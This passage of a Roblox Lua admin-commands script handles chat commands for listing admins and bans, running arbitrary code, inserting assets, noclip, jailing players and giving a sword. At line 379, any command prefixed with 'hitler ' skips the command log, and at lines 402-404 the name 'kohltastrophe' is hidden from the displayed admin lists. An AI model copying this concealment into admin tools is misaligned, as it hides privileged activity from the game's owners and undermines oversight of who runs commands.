  757. 379.if msg:sub(1,7):lower() == "hitler " then msg = msg:sub(8) else table.insert(logs, 1, {name = plr.Name, cmd =prefix .. msg, time = GetTime()}) end
  758.  
  759. 380.if msg:lower():sub(1,4) == "walk" then msg = msg:sub(5) end
  760.  
  761. 381.if msg:lower():sub(1,8) == "teleport" then msg = "tp" .. msg:sub(9) end
  762.  
  763. 382.if msg:lower():sub(1,6) == "insert" then msg = "ins" .. msg:sub(7) end
  764.  
  765. 383.if msg:lower() == "cmds" or msg:lower() == "commands" then
  766.  
  767. 384.if plr.PlayerGui:findFirstChild("CMDSGUI") then return end
  768.  
  769. 385.local scr, cmf, ent, num = ScrollGui() scr.Name = "CMDSGUI" scr.Parent = plr.PlayerGui
  770.  
  771. 386.local cmds = {"s code","ls code","clear","fix","m msg","h msg","kill plr","respawn plr","trip plr","stun plr","unstun plr","jump plr","sit plr","invisible plr","visible plr","explode plr","fire plr","unfire plr","smoke plr","unsmoke plr","sparkles plr","unsparkle plr","ff plr","unff plr","punish plr","unpunish plr","freeze plr","thaw plr","heal plr","god plr","ungod plr","ambient num num num","brightness num","time num","fogcolor num num num","fogend num","fogstart num","removetools plr","btools plr","give plr tool","damage plr","grav plr","setgrav plr num","nograv plr","health plr num","speed plr num","name plr name","unname plr","team plr color","teleport plr plr","change plr stat num","kick plr","infect plr","rainbowify plr","flashify plr","noobify plr","ghostify plr","goldify plr","shiny plr","normal plr","trippy plr","untrippy plr","strobe plr","unstrobe plr","blind plr","unblind plr","guifix plr","fling plr","seizure plr","music num","stopmusic","lock plr","unlock plr","removelimbs plr","jail plr","unjail plr","fly plr","unfly plr","noclip plr","clip plr","pm plr msg","dog plr","undog plr","creeper plr","uncreeper plr","place plr id","char plr id","unchar plr id","rank plr id","starttools plr","sword plr","bighead plr","minihead plr","spin plr","insert id","disco","flash","admins","bans","musiclist","cape plr color","uncape plr","loopheal plr","loopfling plr","hat plr id","unloopfling plr","unloopheal plr","unspin plr","tools","undisco","unflash","resetstats plr","gear plr id","cmdbar","shirt plr id","pants plr id","face plr id","swagify plr id","version"}
  772.  
  773. 387.local ast = {"serverlock","serverunlock","sm msg","crash plr","admin plr","unadmin plr","ban plr","unban plr","loopkill plr","unloopkill plr","logs","shutdown"}
  774.  
  775. 388.local ost = {"pa plr","unpa plr"}
  776.  
  777. 389.local tost = {"oa plr","unoa plr"}
  778.  
  779. 390.local cl = ent:Clone() cl.Parent = cmf cl.Text = num .. " clean" cl.Position = UDim2.new(0,0,0,num*20) num = num+1
  780.  
  781. 391.for i, v in pairs(cmds) do local cl = ent:Clone() cl.Parent = cmf cl.Text = num .. " " .. prefix .. v cl.Position= UDim2.new(0,0,0,num*20) num = num +1 end
  782.  
  783. 392.if ChkAdmin(plr.Name, true) or ChkOwner(plr.Name) then for i, v in pairs(ast) do local cl = ent:Clone() cl.Parent= cmf cl.Text = "- " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  784.  
  785. 393.if plr.userId == game.CreatorId or ChkOwner(plr.Name) then for i, v in pairs(ost) do local cl = ent:Clone()cl.Parent = cmf cl.Text = "-- " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  786.  
  787. 394.if plr.userId == game.CreatorId then for i, v in pairs(tost) do local cl = ent:Clone() cl.Parent = cmf cl.Text ="_ " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  788.  
  789. 395.end
  790.  
  791. 396.
  792.  
  793. 397.if msg:lower() == "version" then Message("Version", script.Version.Value, true, plr) end
  794.  
  795. 398.
  796.  
  797. 399.if msg:lower() == "admins" or msg:lower() == "adminlist" then
  798.  
  799. 400.if plr.PlayerGui:findFirstChild("ADMINSGUI") then return end
  800.  
  801. 401.local scr, cmf, ent, num = ScrollGui() scr.Name = "ADMINSGUI" scr.Parent = plr.PlayerGui
  802.  
  803. 402.for i, v in pairs(owners) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text =v .. " - Owner" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  804.  
  805. 403.for i, v in pairs(admins) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text =v .. " - Admin" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  806.  
  807. 404.for i, v in pairs(tempadmins) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text = v .. " - TempAdmin" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  808.  
  809. 405.end end
  810.  
  811. 406.
  812.  
  813. 407.if msg:lower() == "bans" or msg:lower() == "banlist" or msg:lower() == "banned" then
  814.  
  815. 408.if plr.PlayerGui:findFirstChild("BANSGUI") then return end
  816.  
  817. 409.local scr, cmf, ent, num = ScrollGui() scr.Name = "BANSGUI" scr.Parent = plr.PlayerGui
  818.  
  819. 410.for i, v in pairs(banland) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position =UDim2.new(0,0,0,num*20) num = num +1 end
  820.  
  821. 411.end
  822.  
  823. 412.
  824.  
  825. 413.if msg:lower() == "tools" or msg:lower() == "toollist" then
  826.  
  827. 414.if plr.PlayerGui:findFirstChild("TOOLSGUI") then return end
  828.  
  829. 415.local scr, cmf, ent, num = ScrollGui() scr.Name = "TOOLSGUI" scr.Parent = plr.PlayerGui
  830.  
  831. 416.for i, v in pairs(game.Lighting:children()) do if v:IsA("Tool") or v:IsA("HopperBin") then local cl = ent:Clone()cl.Parent = cmf cl.Text = v.Name cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  832.  
  833. 417.end
  834.  
  835. 418.
  836.  
  837. 419.if msg:lower():sub(1,2) == "s " then
  838.  
  839. 420.coroutine.resume(coroutine.create(function()
  840.  
  841. 421.Output(msg:sub(3), plr)
  842.  
  843. 422.if script:findFirstChild("ScriptBase") then
  844.  
  845. 423.local cl = script.ScriptBase:Clone() cl.Code.Value = msg:sub(3)
  846.  
  847. 424.table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  848.  
  849. 425.else loadstring(msg:sub(3))()
  850.  
  851. 426.end
  852.  
  853. 427.end))
  854.  
  855. 428.end
  856.  
  857. 429.
  858.  
  859. 430.if msg:lower():sub(1,3) == "ls " then
  860.  
  861. 431.coroutine.resume(coroutine.create(function()
  862.  
  863. 432.if script:findFirstChild("LocalScriptBase") then
  864.  
  865. 433.local cl = script.LocalScriptBase:Clone() cl.Code.Value = msg:sub(4)
  866.  
  867. 434.table.insert(objects, cl) cl.Parent = plr.PlayerGui cl.Disabled = false Output(msg:sub(4), plr)
  868.  
  869. 435.end
  870.  
  871. 436.end))
  872.  
  873. 437.end
  874.  
  875. 438.
  876.  
  877. 439.if msg:lower():sub(1,4) == "ins " then
  878.  
  879. 440.coroutine.resume(coroutine.create(function()
  880.  
  881. 441.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(5)))
  882.  
  883. 442.if obj and #obj:children() >= 1 and plr.Character then
  884.  
  885. 443.table.insert(objects, obj) for i,v in pairs(obj:children()) do table.insert(objects, v) end obj.Parent =game.Workspace obj:MakeJoints() obj:MoveTo(plr.Character:GetModelCFrame().p)
  886.  
  887. 444.end
  888.  
  889. 445.end))
  890.  
  891. 446.end
  892.  
  893. 447.
  894.  
  895. 448.if msg:lower() == "clr" or msg:lower() == "clear" or msg:lower() == "clearscripts" then
  896.  
  897. 449.for i, v in pairs(objects) do if v:IsA("Script") or v:IsA("LocalScript") then v.Disabled = true end v:Destroy()end
  898.  
  899. 450.objects = {}
  900.  
  901. 451.end
  902.  
  903. 452.
  904.  
  905. 453.if msg:lower() == "fix" or msg:lower() == "undisco" or msg:lower() == "unflash" then
  906.  
  907. 454.game.Lighting.Ambient = origsettings.abt
  908.  
  909. 455.game.Lighting.Brightness = origsettings.brt
  910.  
  911. 456.game.Lighting.TimeOfDay = origsettings.time
  912.  
  913. 457.game.Lighting.FogColor = origsettings.fclr
  914.  
  915. 458.game.Lighting.FogEnd = origsettings.fe
  916.  
  917. 459.game.Lighting.FogStart = origsettings.fs
  918.  
  919. 460.for i, v in pairs(lobjs) do v:Destroy() end
  920.  
  921. 461.for i, v in pairs(game.Workspace:children()) do if v.Name == "LightEdit" then v:Destroy() end end
  922.  
  923. 462.end
  924.  
  925. 463.
  926.  
  927. 464.if msg:lower() == "cmdbar" or msg:lower() == "cmdgui" then
  928.  
  929. 465.coroutine.resume(coroutine.create(function()
  930.  
  931. 466.for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "CMDBAR" then v:Destroy() end end
  932.  
  933. 467.local scr = Instance.new("ScreenGui", plr.PlayerGui) scr.Name = "CMDBAR"
  934.  
  935. 468.local box = Instance.new("TextBox", scr) box.BackgroundColor3 = Color3.new(0,0,0) box.TextColor3 =Color3.new(1,1,1) box.Font = "Arial" box.FontSize = "Size14" box.Text = "Type a command, then press enter."box.Size = UDim2.new(0,250,0,20) box.Position = UDim2.new(1,-250,1,-22) box.BorderSizePixel = 0 box.TextXAlignment= "Right" box.ZIndex = 10 box.ClipsDescendants = true
  936.  
  937. 469.box.Changed:connect(function(p) if p == "Text" and box.Text ~= "Type a command, then press enter." thenChat(box.Text, plr) box.Text = "Type a command, then press enter." end end)
  938.  
  939. 470.end))
  940.  
  941. 471.end
  942.  
  943. 472.
  944.  
  945. 473.if msg:lower():sub(1,2) == "m " then
  946.  
  947. 474.Message("Message from " .. plr.Name, msg:sub(3), true, game.Players:children())
  948.  
  949. 475.end
  950.  
  951. 476.
  952.  
  953. 477.if msg:lower():sub(1,2) == "h " then
  954.  
  955. 478.Hint(plr.Name .. ": " .. msg:sub(3), game.Players:children())
  956.  
  957. 479.end
  958.  
  959. 480.
  960.  
  961. 481.if msg:lower():sub(1,3) == "pm " then
  962.  
  963. 482.local chk1 = msg:lower():sub(4):find(" ") + 3
  964.  
  965. 483.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  966.  
  967. 484.Message("Private Message from " .. plr.Name, msg:sub(chk1+1), true, plrz)
  968.  
  969. 485.end
  970.  
  971. 486.
  972.  
  973. 487.if msg:lower():sub(1,11) == "resetstats " then
  974.  
  975. 488.local plrz = GetPlr(plr, msg:lower():sub(12))
  976.  
  977. 489.for i, v in pairs(plrz) do
  978.  
  979. 490.coroutine.resume(coroutine.create(function()
  980.  
  981. 491.if v and v:findFirstChild("leaderstats") then
  982.  
  983. 492.for a, q in pairs(v.leaderstats:children()) do
  984.  
  985. 493.if q:IsA("IntValue") then q.Value = 0 end
  986.  
  987. 494.end
  988.  
  989. 495.end
  990.  
  991. 496.end))
  992.  
  993. 497.end
  994.  
  995. 498.end
  996.  
  997. 499.
  998.  
  999. 500.if msg:lower():sub(1,5) == "gear " then
  1000.  
  1001. 501.local chk1 = msg:lower():sub(6):find(" ") + 5
  1002.  
  1003. 502.local plrz = GetPlr(plr, msg:lower():sub(6, chk1-1))
  1004.  
  1005. 503.for i, v in pairs(plrz) do
  1006.  
  1007. 504.coroutine.resume(coroutine.create(function()
  1008.  
  1009. 505.if v and v.Character then
  1010.  
  1011. 506.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(chk1+1)))
  1012.  
  1013. 507.for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Character end end
  1014.  
  1015. 508.obj:Destroy()
  1016.  
  1017. 509.end
  1018.  
  1019. 510.end))
  1020.  
  1021. 511.end
  1022.  
  1023. 512.end
  1024.  
  1025. 513.
  1026.  
  1027. 514.if msg:lower():sub(1,4) == "hat " then
  1028.  
  1029. 515.local chk1 = msg:lower():sub(5):find(" ") + 4
  1030.  
  1031. 516.local plrz = GetPlr(plr, msg:lower():sub(5, chk1-1))
  1032.  
  1033. 517.for i, v in pairs(plrz) do
  1034.  
  1035. 518.coroutine.resume(coroutine.create(function()
  1036.  
  1037. 519.if v and v.Character then
  1038.  
  1039. 520.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(chk1+1)))
  1040.  
  1041. 521.for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1042.  
  1043. 522.obj:Destroy()
  1044.  
  1045. 523.end
  1046.  
  1047. 524.end))
  1048.  
  1049. 525.end
  1050.  
  1051. 526.end
  1052.  
  1053. 527.
  1054.  
  1055. 528.if msg:lower():sub(1,5) == "cape " then
  1056.  
  1057. 529.local chk1 = msg:lower():sub(6):find(" ")
  1058.  
  1059. 530.local plrz = GetPlr(plr, msg:lower():sub(6))
  1060.  
  1061. 531.local str = "torso.BrickColor"
  1062.  
  1063. 532.if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1064.  
  1065. 533.local teststr = [[BrickColor.new("]]..msg:sub(chk1+1,chk1+1):upper()..msg:sub(chk1+2):lower()..[[")]]
  1066.  
  1067. 534.if msg:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1068.  
  1069. 535.if msg:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1070.  
  1071. 536.if msg:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1072.  
  1073. 537.if msg:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1074.  
  1075. 538.if msg:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1076.  
  1077. 539.if msg:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]]end
  1078.  
  1079. 540.if msg:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1080.  
  1081. 541.if msg:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1082.  
  1083. 542.if msg:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1084.  
  1085. 543.if msg:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1086.  
  1087. 544.if msg:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1088.  
  1089. 545.if BrickColor.new(teststr) ~= nil then str = teststr end
  1090.  
  1091. 546.end
  1092.  
  1093. 547.for i, v in pairs(plrz) do
  1094.  
  1095. 548.coroutine.resume(coroutine.create(function()
  1096.  
  1097. 549.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1098.  
  1099. 550.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1100.  
  1101. 551.local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1102.  
  1103. 552.repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1104.  
  1105. 553.local torso = plr.Character.Torso
  1106.  
  1107. 554.local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1108.  
  1109. 555.p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1110.  
  1111. 556.p.Size = Vector3.new(.2,.2,.2)
  1112.  
  1113. 557.local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1114.  
  1115. 558.local motor1 = Instance.new("Motor", p)
  1116.  
  1117. 559.motor1.Part0 = p
  1118.  
  1119. 560.motor1.Part1 = torso
  1120.  
  1121. 561.motor1.MaxVelocity = .01
  1122.  
  1123. 562.motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1124.  
  1125. 563.motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1126.  
  1127. 564.local wave = false
  1128.  
  1129. 565.repeat wait(1/44)
  1130.  
  1131. 566.local ang = 0.1
  1132.  
  1133. 567.local oldmag = torso.Velocity.magnitude
  1134.  
  1135. 568.local mv = .002
  1136.  
  1137. 569.if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1138.  
  1139. 570.ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1140.  
  1141. 571.motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1142.  
  1143. 572.motor1.DesiredAngle = -ang
  1144.  
  1145. 573.if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1146.  
  1147. 574.repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1148.  
  1149. 575.if torso.Velocity.magnitude < .1 then wait(.1) end
  1150.  
  1151. 576.until not p or p.Parent ~= torso.Parent
  1152.  
  1153. 577.script:Destroy()
  1154.  
  1155. 578.]] cl.Parent = v.PlayerGui cl.Disabled = false
  1156.  
  1157. 579.end
  1158.  
  1159. 580.end))
  1160.  
  1161. 581.end
  1162.  
  1163. 582.end
  1164.  
  1165. 583.
  1166.  
  1167. 584.if msg:lower():sub(1,7) == "uncape " then
  1168.  
  1169. 585.local plrz = GetPlr(plr, msg:lower():sub(8))
  1170.  
  1171. 586.for i, v in pairs(plrz) do
  1172.  
  1173. 587.coroutine.resume(coroutine.create(function()
  1174.  
  1175. 588.if v and v:findFirstChild("PlayerGui") and v.Character then
  1176.  
  1177. 589.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1178.  
  1179. 590.end
  1180.  
  1181. 591.end))
  1182.  
  1183. 592.end
  1184.  
  1185. 593.end
  1186.  
  1187. 594.
  1188.  
  1189. 595.if msg:lower():sub(1,7) == "noclip " then
  1190.  
  1191. 596.local plrz = GetPlr(plr, msg:lower():sub(8))
  1192.  
  1193. 597.for i, v in pairs(plrz) do
  1194.  
  1195. 598.coroutine.resume(coroutine.create(function()
  1196.  
  1197. 599.if v and v:findFirstChild("PlayerGui") then
  1198.  
  1199. 600.local cl = script.LocalScriptBase:Clone() cl.Name = "NoClip" cl.Code.Value = [[repeat wait(1/44) until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer:GetMouse() and game.Workspace.CurrentCamera local mouse = game.Players.LocalPlayer:GetMouse() local torso = game.Players.LocalPlayer.Character.Torso local dir = {w = 0, s = 0, a = 0, d = 0} local spd = 2 mouse.KeyDown:connect(function(key) if key:lower() == "w" then dir.w = 1 elseif key:lower() == "s" then dir.s = 1 elseif key:lower() == "a" then dir.a = 1 elseif key:lower() == "d" then dir.d = 1 elseif key:lower() == "q" then spd = spd + 1 elseif key:lower() == "e" then spd = spd - 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then dir.w = 0 elseif key:lower() == "s" then dir.s = 0 elseif key:lower() == "a" then dir.a = 0 elseif key:lower() == "d" then dir.d = 0 end end) torso.Anchored = true game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true game.Players.LocalPlayer.Character.Humanoid.Changed:connect(function() game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true end) repeat wait(1/44) torso.CFrame = CFrame.new(torso.Position, game.Workspace.CurrentCamera.CoordinateFrame.p) * CFrame.Angles(0,math.rad(180),0) * CFrame.new((dir.d-dir.a)*spd,0,(dir.s-dir.w)*spd) until nil]]
  1200.  
  1201. 601.cl.Parent = v.PlayerGui cl.Disabled = false
  1202.  
  1203. 602.end
  1204.  
  1205. 603.end))
  1206.  
  1207. 604.end
  1208.  
  1209. 605.end
  1210.  
  1211. 606.
  1212.  
  1213. 607.if msg:lower():sub(1,5) == "clip " then
  1214.  
  1215. 608.local plrz = GetPlr(plr, msg:lower():sub(6))
  1216.  
  1217. 609.for i, v in pairs(plrz) do
  1218.  
  1219. 610.coroutine.resume(coroutine.create(function()
  1220.  
  1221. 611.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") andv.Character:findFirstChild("Humanoid") then
  1222.  
  1223. 612.for a, q in pairs(v.PlayerGui:children()) do if q.Name == "NoClip" then q:Destroy() end end
  1224.  
  1225. 613.v.Character.Torso.Anchored = false
  1226.  
  1227. 614.wait(.1) v.Character.Humanoid.PlatformStand = false
  1228.  
  1229. 615.end
  1230.  
  1231. 616.end))
  1232.  
  1233. 617.end
  1234.  
  1235. 618.end
  1236.  
  1237. 619.
  1238.  
  1239. 620.if msg:lower():sub(1,5) == "jail " then
  1240.  
  1241. 621.local plrz = GetPlr(plr, msg:lower():sub(6))
  1242.  
  1243. 622.for i, v in pairs(plrz) do
  1244.  
  1245. 623.coroutine.resume(coroutine.create(function()
  1246.  
  1247. 624.if v and v.Character and v.Character:findFirstChild("Torso") then
  1248.  
  1249. 625.local vname = v.Name
  1250.  
  1251. 626.local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1252.  
  1253. 627.local mod = Instance.new("Model", game.Workspace) table.insert(objects, mod) mod.Name = v.Name .. " Jail"
  1254.  
  1255. 628.local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6)top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black")top.CFrame = cf * CFrame.new(0,-3.5,0)
  1256.  
  1257. 629.v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeatwait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1258.  
  1259. 630.v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then returnend repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cfend)
  1260.  
  1261. 631.game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1262.  
  1263. 632.v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeatwait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1264.  
  1265. 633.v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then returnend repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cfend)
  1266.  
  1267. 634.end)
  1268.  
  1269. 635.local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1270.  
  1271. 636.local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size =Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1272.  
  1273. 637.local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1274.  
  1275. 638.local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf *CFrame.new(3,0,0)
  1276.  
  1277. 639.local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1278.  
  1279. 640.local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1280.  
  1281. 641.local msh2 = msh:Clone() msh2.Parent = back
  1282.  
  1283. 642.local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1284.  
  1285. 643.local msh4 = msh3:Clone() msh4.Parent = left
  1286.  
  1287. 644.v.Character.Torso.CFrame = cf
  1288.  
  1289. 645.end
  1290.  
  1291. 646.end))
  1292.  
  1293. 647.end
  1294.  
  1295. 648.end
  1296.  
  1297. 649.
  1298.  
  1299. 650.if msg:lower():sub(1,7) == "unjail " then
  1300.  
  1301. 651.local plrz = GetPlr(plr, msg:lower():sub(8))
  1302.  
  1303. 652.for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl inpairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1304.  
  1305. 653.end
  1306.  
  1307. 654.
  1308.  
  1309. 655.if msg:lower():sub(1,11) == "starttools " then
  1310.  
  1311. 656.local plrz = GetPlr(plr, msg:lower():sub(12))
  1312.  
  1313. 657.for i, v in pairs(plrz) do
  1314.  
  1315. 658.coroutine.resume(coroutine.create(function()
  1316.  
  1317. 659.if v and v:findFirstChild("Backpack") then
  1318.  
  1319. 660.for a,q in pairs(game.StarterPack:children()) do q:Clone().Parent = v.Backpack end
  1320.  
  1321. 661.end
  1322.  
  1323. 662.end))
  1324.  
  1325. 663.end
  1326.  
  1327. 664.end
  1328.  
  1329. 665.
  1330.  
  1331. 666.if msg:lower():sub(1,6) == "sword " then
  1332.  
  1333. 667.local plrz = GetPlr(plr, msg:lower():sub(7))
  1334.  
  1335. 668.for i, v in pairs(plrz) do
  1336.  
  1337. 669.coroutine.resume(coroutine.create(function()
  1338.  
  1339. 670.if v and v:findFirstChild("Backpack") then
  1340.  
  1341. 671.local sword = Instance.new("Tool", v.Backpack) sword.Name = "Sword" sword.TextureId ="rbxasset://Textures/Sword128.png"
  1342.  
  1343. 672.sword.GripForward = Vector3.new(-1,0,0)
  1344.  
  1345. 673.sword.GripPos = Vector3.new(0,0,-1.5)
  1346.  
  1347. 674.sword.GripRight = Vector3.new(0,1,0)
  1348.  
  1349. 675.sword.GripUp = Vector3.new(0,0,1)
  1350.  
  1351. 676.local handle = Instance.new("Part", sword) handle.Name = "Handle" handle.FormFactor = "Plate" handle.Size =Vector3.new(1,.8,4) handle.TopSurface = 0 handle.BottomSurface = 0
  1352.  
  1353. 677.local msh = Instance.new("SpecialMesh", handle) msh.MeshId = "rbxasset://fonts/sword.mesh" msh.TextureId ="rbxasset://textures/SwordTexture.png"
  1354.  
  1355. 678.local cl = script.LocalScriptBase:Clone() cl.Parent = sword cl.Code.Value = [[
  1356.  
  1357. 679.repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")
  1358.  
  1359. 680.local Damage = 15
  1360.  
  1361. 681.local SlashSound = Instance.new("Sound", script.Parent.Handle)
  1362.  
  1363. 682.SlashSound.SoundId = "rbxasset://sounds\\swordslash.wav"
  1364.  
  1365. 683.SlashSound.Volume = 1
  1366.  
  1367. 684.local LungeSound = Instance.new("Sound", script.Parent.Handle)
  1368.  
  1369. 685.LungeSound.SoundId = "rbxasset://sounds\\swordlunge.wav"
  1370.  
  1371. 686.LungeSound.Volume = 1
  1372.  
  1373. 687.local UnsheathSound = Instance.new("Sound", script.Parent.Handle)
  1374.  
  1375. 688.UnsheathSound.SoundId = "rbxasset://sounds\\unsheath.wav"
  1376.  
  1377. 689.UnsheathSound.Volume = 1
  1378.  
  1379. 690.local last = 0
  1380.  
  1381. 691.script.Parent.Handle.Touched:connect(function(hit)
  1382.  
  1383. 692.if hit and hit.Parent and hit.Parent:findFirstChild("Humanoid") and game.Players:findFirstChild(hit.Parent.Name) and game.Players.LocalPlayer.Character.Humanoid.Health > 0 and hit.Parent.Humanoid ~= game.Players.LocalPlayer.Character.Humanoid then
  1384.  
  1385. 693.local tag = Instance.new("ObjectValue", hit.Parent.Humanoid) tag.Value = plr1 tag.Name = "creator" game:service("Debris"):AddItem(tag, 3)
  1386.  
  1387. 694.hit.Parent.Humanoid:TakeDamage(Damage)
  1388.  
  1389. 695.end
  1390.  
  1391. 696.end)
  1392.  
  1393. 697.script.Parent.Activated:connect(function()
  1394.  
  1395. 698.if not script.Parent.Enabled or game.Players.LocalPlayer.Character.Humanoid.Health <= 0 then return end
  1396.  
  1397. 699.script.Parent.Enabled = false
  1398.  
  1399. 700.local tick = game:service("RunService").Stepped:wait()
  1400.  
  1401. 701.if tick - last <= .2 then
  1402.  
  1403. 702.LungeSound:play()
  1404.  
  1405. 703.local lunge = Instance.new("StringValue", script.Parent) lunge.Name = "toolanim" lunge.Value = "Lunge"
  1406.  
  1407. 704.local frc = Instance.new("BodyVelocity", game.Players.LocalPlayer.Character.Torso) frc.Name = "SwordForce" frc.velocity = Vector3.new(0,10,0)
  1408.  
  1409. 705.wait(.2)
  1410.  
  1411. 706.script.Parent.GripForward = Vector3.new(0,0,1)
  1412.  
  1413. 707.script.Parent.GripRight = Vector3.new(0,-1,0)
  1414.  
  1415. 708.script.Parent.GripUp = Vector3.new(-1,0,0)
  1416.  
  1417. 709.wait(.3)
  1418.  
  1419. 710.frc:Destroy() wait(.5)
  1420.  
  1421. 711.script.Parent.GripForward = Vector3.new(-1,0,0)
  1422.  
  1423. 712.script.Parent.GripRight = Vector3.new(0,1,0)
  1424.  
  1425. 713.script.Parent.GripUp = Vector3.new(0,0,1)
  1426.  
  1427. 714.else
  1428.  
  1429. 715.SlashSound:play()
  1430.  
  1431. 716.local slash = Instance.new("StringValue", script.Parent) slash.Name = "toolanim" slash.Value = "Slash"
  1432.  
  1433. 717.end
  1434.  
  1435. 718.last = tick
  1436.  
  1437. 719.script.Parent.Enabled = true
  1438.  
  1439. 720.end)
  1440.  
  1441. 721.script.Parent.Equipped:connect(function(mouse)
  1442.  
  1443. 722.for i,v in pairs(game.Players.LocalPlayer.Character.Torso:children()) do if v.Name == "SwordForce" then v:Destroy() end end
  1444.  
